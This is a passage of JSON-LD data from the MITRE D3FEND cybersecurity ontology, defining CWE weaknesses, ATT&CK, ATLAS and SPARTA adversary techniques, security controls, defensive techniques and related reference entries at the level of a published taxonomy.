      "rdfs:label": "Reference - CAR-2020-11-010: CMSTP - MITRE"
    },
    {
      "@id": "d3f:CWE-583",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-583",
      "d3f:definition": "The product violates secure coding principles for mobile code by declaring a finalize() method public.",
      "rdfs:label": "finalize() Method Declared Public",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ApplicationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures the behavior, state, or interactions of software applications or services operating within a system. Application events encompass lifecycle changes, configuration updates, and operational anomalies, providing insight into the health and performance of software components.",
      "rdfs:label": "Application Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/application_lifecycle"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nbabb2485b9f7467ca937f474e9d1bf8a"
        }
      ]
    },
    {
      "@id": "_:Nbabb2485b9f7467ca937f474e9d1bf8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:CorrelationClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CC",
      "d3f:definition": "Correlation clustering provides a method for clustering a set of objects into the optimum number of clusters without specifying that number in advance.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Correlation clustering. [Link](https://en.wikipedia.org/wiki/Correlation_clustering)",
      "rdfs:label": "Correlation Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:CWE-1066",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1066",
      "d3f:definition": "The product contains a serializable data element that does not have an associated serialization method.",
      "rdfs:label": "Missing Serialization Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:FileSystemSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects files and file metadata on an endpoint.",
      "d3f:monitors": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File System Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N79d097b794f345ac8c9b646a270e247b"
        }
      ]
    },
    {
      "@id": "_:N79d097b794f345ac8c9b646a270e247b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DE-0009.05",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.05",
      "d3f:definition": "The adversary targets terrestrial space-domain awareness pipelines, sensor networks, tracking centers, catalogs, and their data flows, to blind or confuse broad-area monitoring. Paths include compromising or spoofing observational feeds (radar/optical returns, TLE updates, ephemeris exchanges), injecting falsified or time-shifted tracks, tampering with fusion/association parameters, and saturating ingestion and alerting with noisy or adversarial inputs. Where SDA employs AI/ML for detection and correlation, the attacker can degrade models by flooding them with ambiguous scenes or crafted features that increase false positives/negatives and consume analyst cycles. Unlike onboard deception, this approach skews the external decision-support picture across many assets at once, delaying detection of real maneuvers and providing cover for concurrent operations.",
      "rdfs:label": "Corruption or Overload of Ground-Based SDA Systems - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Corruption or Overload of Ground-Based SDA Systems"
    },
    {
      "@id": "d3f:T1553.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.001",
      "d3f:definition": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as a layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Gatekeeper Bypass",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:N00eca59a3cb248819e7d25350cb97045"
        }
      ]
    },
    {
      "@id": "_:N00eca59a3cb248819e7d25350cb97045",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:T1556.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.005",
      "d3f:definition": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)",
      "rdfs:label": "Reversible Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-226",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-226",
      "d3f:definition": "The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or \"zeroize\" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities.",
      "rdfs:label": "Sensitive Information in Resource Not Removed Before Reuse",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-212"
        },
        {
          "@id": "d3f:CWE-459"
        }
      ]
    },
    {
      "@id": "d3f:CustomArchiveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A custom archive file is an archive file conforming to a custom format; that is, an archive file that does not conform to a common standard.",
      "rdfs:label": "Custom Archive File",
      "rdfs:subClassOf": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:CWE-64",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-64",
      "d3f:definition": "The product, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.",
      "d3f:synonym": [
        "Windows symbolic link following",
        "symlink"
      ],
      "rdfs:label": "Windows Shortcut Following (.LNK)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-59"
      }
    },
    {
      "@id": "d3f:CCI-001096_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system limits the use of resources by priority.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001096"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_29",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Filter Orchestration Engines",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(29)"
    },
    {
      "@id": "d3f:CWE-580",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-580",
      "d3f:definition": "The product contains a clone() method that does not call super.clone() to obtain the new object.",
      "rdfs:label": "clone() Method Without super.clone()",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:T1632.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1632.001",
      "d3f:definition": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device.",
      "rdfs:label": "Code Signing Policy Modification - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1632"
      },
      "skos:prefLabel": "Code Signing Policy Modification"
    },
    {
      "@id": "d3f:ROM",
      "@type": "owl:Class",
      "d3f:definition": "Read-only memory (ROM) is a type of non-volatile memory used in computers and other electronic devices. Data stored in ROM cannot be electronically modified after the manufacture of the memory device. Read-only memory is useful for storing software that is rarely changed during the life of the system, also known as firmware.",
      "d3f:synonym": "Read-only Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Read-only_memory"
      },
      "rdfs:label": "ROM",
      "rdfs:subClassOf": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:AudioInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Audio input devices allow a user to send audio info to a computer for processing, recording, or carrying out commands. Devices such as microphones allow users to speak to the computer in order to record a voice message or navigate software. Aside from recording, audio input devices are also used with speech recognition software.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Input_device#Voice_input_devices"
      },
      "rdfs:label": "Audio Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:GoodmanAndKruskalsGamma",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GAKG",
      "d3f:definition": "Goodman-Kruskal $\\\\gamma$ is a measure of rank correlation between x and y and is given by $(n_c -n_d) / (n_c + n_d)$, where $n_c$ is the number of concordant pairs of the observations and $n_d$ is the number of discordant pairs.",
      "d3f:kb-article": "## References\n1. Wolfram Research. (2012). GoodmanKruskalGamma. Wolfram Language function.  [Link](https://reference.wolfram.com/language/ref/GoodmanKruskalGamma.html)\n1. Goodman and Kruskal's gamma. (2022, Nov 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Goodman_and_Kruskal%27s_gamma)",
      "rdfs:isDefinedBy": {
        "@id": "https://reference.wolfram.com/language/ref/GoodmanKruskalGamma.html"
      },
      "rdfs:label": "Goodman and Kruskal's Gamma",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:SystemTimeApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system time utility is utility software that can get the system time, such as the Unix date command or Windows' Net utility.",
      "d3f:reads": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Time Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UtilitySoftware"
        },
        {
          "@id": "_:Nc80cf127993a47e2bbe1baa6104a5194"
        }
      ]
    },
    {
      "@id": "_:Nc80cf127993a47e2bbe1baa6104a5194",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:M1043",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "rdfs:label": "Credential Access Protection"
    },
    {
      "@id": "d3f:LuaScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Lua Script File"
    },
    {
      "@id": "d3f:T1589.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.003",
      "d3f:definition": "Adversaries may gather employee names that can be used during targeting. Employee names may be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.",
      "rdfs:label": "Employee Names",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:OTDeviceIdentificationMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Identify devices on the network.",
      "rdfs:label": "OT Device Identification Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N3ebbab85c900463596e586e5367f118d"
        }
      ]
    },
    {
      "@id": "_:N3ebbab85c900463596e586e5367f118d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceIdentificationMessage"
      }
    },
    {
      "@id": "d3f:HardwareClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a physical timekeeping mechanism implemented in hardware components.",
      "rdfs:label": "Hardware Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClockEvent"
        },
        {
          "@id": "_:N6230251b318f442282c63dcf3b7eb382"
        }
      ]
    },
    {
      "@id": "_:N6230251b318f442282c63dcf3b7eb382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:ContentRebuild",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentRebuild"
      ],
      "d3f:d3fend-id": "D3-CNR",
      "d3f:definition": "Rebuild the file according to the spec so any unreferenced components or objects are removed.",
      "d3f:kb-article": "## How it works\n\nIf inputted content is divided up into components for further scrutiny, the components may be combined back afterwards in a safer state.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:synonym": "Content Reconstruction",
      "rdfs:label": "Content Rebuild",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:T1098",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098",
      "d3f:definition": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.",
      "d3f:modifies": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Account Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:Nc0ee703e7c3346fdaa894d57891fcd7c"
        }
      ]
    },
    {
      "@id": "_:Nc0ee703e7c3346fdaa894d57891fcd7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1139",
      "@type": "owl:Class",
      "d3f:attack-id": "T1139",
      "d3f:definition": "Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.003",
      "rdfs:label": "Bash History",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:NetworkTrafficAnalysisSoftware",
      "@type": "owl:Class",
      "d3f:definition": "A packet analyzer, also known as packet sniffer, protocol analyzer, or network analyzer, is a computer program or computer hardware such as a packet capture appliance, that can intercept and log traffic that passes over a computer network or part of a network.",
      "d3f:synonym": "Network Sniffer",
      "rdfs:label": "Network Traffic Analysis Software",
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      }
    },
    {
      "@id": "d3f:Reference-DaggerFactSheet",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.jhuapl.edu/dagger/documents/DaggerFactSheet.pdf"
      },
      "d3f:kb-abstract": "Dagger is a modeling and visualization tool suite that shows how system failures impact mission status. Updated with manual or real-time status, Dagger is used for mission/system planning, situational awareness during mission execution, and course-of-action analysis.",
      "d3f:kb-author": "Jackie Soenneker",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Dagger Fact Sheet",
      "rdfs:label": "Reference - Dagger Fact Sheet"
    },
    {
      "@id": "d3f:CWE-1094",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1094",
      "d3f:definition": "The product contains an index range scan for a large data table, but the scan can cover a large number of rows.",
      "rdfs:label": "Excessive Index Range Scan for a Data Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:T1584",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584",
      "d3f:definition": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.",
      "rdfs:label": "Compromise Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:encodes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x encodes y: The entity x transforms data y to a different form, usually through compression.",
      "rdfs:label": "encodes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-616",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-616",
      "d3f:definition": "The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files.",
      "rdfs:label": "Incomplete Identification of Uploaded File Variables (PHP)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-AutomaticallyGeneratingNetworkResourceGroupsAndAssigningCustomizedDecoyPoliciesThereto_IllusiveNetworksLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170310689A1"
      },
      "d3f:kb-abstract": "A cyber security system comprising circuitry of a decoy deployer planting one or more decoy lateral attack vectors in each of a first and a second group of resources within a common enterprise network of resources, the first and second groups of resources having different characteristics in terms of subnets, naming conventions, DNS aliases, listening ports, users and their privileges, and installed applications, wherein a lateral attack vector is an object of a first resource within the network that has a potential to be used by an attacker who discovered the first resource to further discover information regarding a second resource within the network, the second resource being previously undiscovered by the attacker, and wherein the decoy lateral attack vectors in the first group conform to the characteristics of the first group, and the decoy lateral attack vectors in the second group conform to the characteristics of the second group.",
      "d3f:kb-author": "Shlomo Touboul; Hanan Levin; Stephane Roubach; Assaf Mischari; Itai Ben David; Itay Avraham; Adi Ozer; Chen Kazaz; Ofer Israeli; Olga Vingurt; Liad Gareh; Israel Grimberg; Cobby Cohen; Sharon Sultan; Matan Kubovsky",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Illusive Networks Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Automatically generating network resource groups and assigning customized decoy policies thereto",
      "rdfs:label": "Reference - Automatically generating network resource groups and assigning customized decoy policies thereto - Illusive Networks Ltd"
    },
    {
      "@id": "d3f:kb-organization",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-organization y: The reference x was created or owned by the organization y.",
      "rdfs:label": "kb-organization",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:AML.TA0012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0012",
      "d3f:definition": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:\n- SYSTEM/root level\n- local administrator\n- user account with admin-like access\n- user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.",
      "rdfs:label": "Privilege Escalation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0012"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:T1036.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.009",
      "d3f:definition": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child” relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022)",
      "rdfs:label": "Break Process Trees",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:LegacySystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a legacy system is an old method, technology, computer system, or application program, \"of, relating to, or being a previous or outdated computer system,\" yet still in use. Often referencing a system as \"legacy\" means that it paved the way for the standards that would follow it. This can also imply that the system is out of date or in need of replacement.",
      "d3f:synonym": "Legacy Digital System",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Legacy_system"
      },
      "rdfs:label": "Legacy System",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalSystem"
      }
    },
    {
      "@id": "d3f:T1447",
      "@type": "owl:Class",
      "d3f:attack-id": "T1447",
      "d3f:definition": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.002",
      "rdfs:label": "Delete Device Data - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Delete Device Data"
    },
    {
      "@id": "d3f:AML.T0036",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0036",
      "d3f:definition": "Adversaries may leverage information repositories to mine valuable information.\nInformation repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nInformation stored in a repository may vary based on the specific instance or environment.\nSpecific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.",
      "rdfs:label": "Data from Information Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0036"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from Information Repositories"
    },
    {
      "@id": "d3f:T1194",
      "@type": "owl:Class",
      "d3f:attack-id": "T1194",
      "d3f:definition": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.003",
      "rdfs:label": "Spearphishing via Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:DigitalDocument",
      "@type": "owl:Class",
      "d3f:definition": "A digital document is any electronic media content (other than computer programs or system files) that is intended to be used in either an electronic form or as printed output.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Electronic_document",
      "rdfs:label": "Digital Document",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:UserToUserMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Personal message, private message (PM), direct message (DM), or personal chat (PC) is a private form of messaging between different members on a given platform. It is only seen and accessible by the users participating in the message.",
      "d3f:has-recipient": {
        "@id": "d3f:UserAccount"
      },
      "d3f:has-sender": {
        "@id": "d3f:UserAccount"
      },
      "d3f:may-contain": {
        "@id": "d3f:Email"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Personal_message"
      },
      "rdfs:label": "User to User Message",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalMessage"
        },
        {
          "@id": "_:N137ca8f7c5f04b479a63e824f65fc0ba"
        },
        {
          "@id": "_:N1789a6c0807e4dcf9cd82a5547913e9e"
        },
        {
          "@id": "_:N7a9e67c1d1534085bcc9fd7acfea239f"
        }
      ],
      "skos:altLabel": [
        "Personal Message",
        "Private Message"
      ]
    },
    {
      "@id": "_:N137ca8f7c5f04b479a63e824f65fc0ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-recipient"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N1789a6c0807e4dcf9cd82a5547913e9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-sender"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N7a9e67c1d1534085bcc9fd7acfea239f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CoefficientOfVariation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-COV",
      "d3f:definition": "The coefficient of variation (CV), also known as relative standard deviation (RSD), is a standardized measure of dispersion of a probability distribution or frequency distribution.\n\nThe coefficient of variation (CV) is defined as the ratio of the standard deviation to the mean.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Coefficient of variation. [Link](https://en.wikipedia.org/wiki/Coefficient_of_variation)",
      "d3f:synonym": [
        "RSD",
        "Relative Standard Deviation"
      ],
      "rdfs:label": "Coefficient of Variation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:CWE-76",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-76",
      "d3f:definition": "The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.",
      "rdfs:label": "Improper Neutralization of Equivalent Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-75"
      }
    },
    {
      "@id": "d3f:MemoryWriteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process writes data to a memory address, storing new information or updating existing content.",
      "rdfs:label": "Memory Write Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nfabd3c0afef04f5a9ab5cf05f001f878"
        }
      ]
    },
    {
      "@id": "_:Nfabd3c0afef04f5a9ab5cf05f001f878",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:LogististicRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LRL",
      "d3f:definition": "A supervised learning method that builds a logistic regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Logistic regression. [Link](https://en.wikipedia.org/wiki/Logistic_regression)",
      "rdfs:label": "Logistic Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:LogisticRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:CCI-001178_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides additional data origin authentication artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001178"
    },
    {
      "@id": "d3f:Telecommand",
      "@type": "owl:Class",
      "d3f:definition": "A telecommand or telecontrol is a command sent to control a remote system or systems not directly connected (e.g. via wires) to the place from which the telecommand is sent.",
      "d3f:synonym": "Remote Control Command",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Telecommand"
      },
      "rdfs:label": "Telecommand",
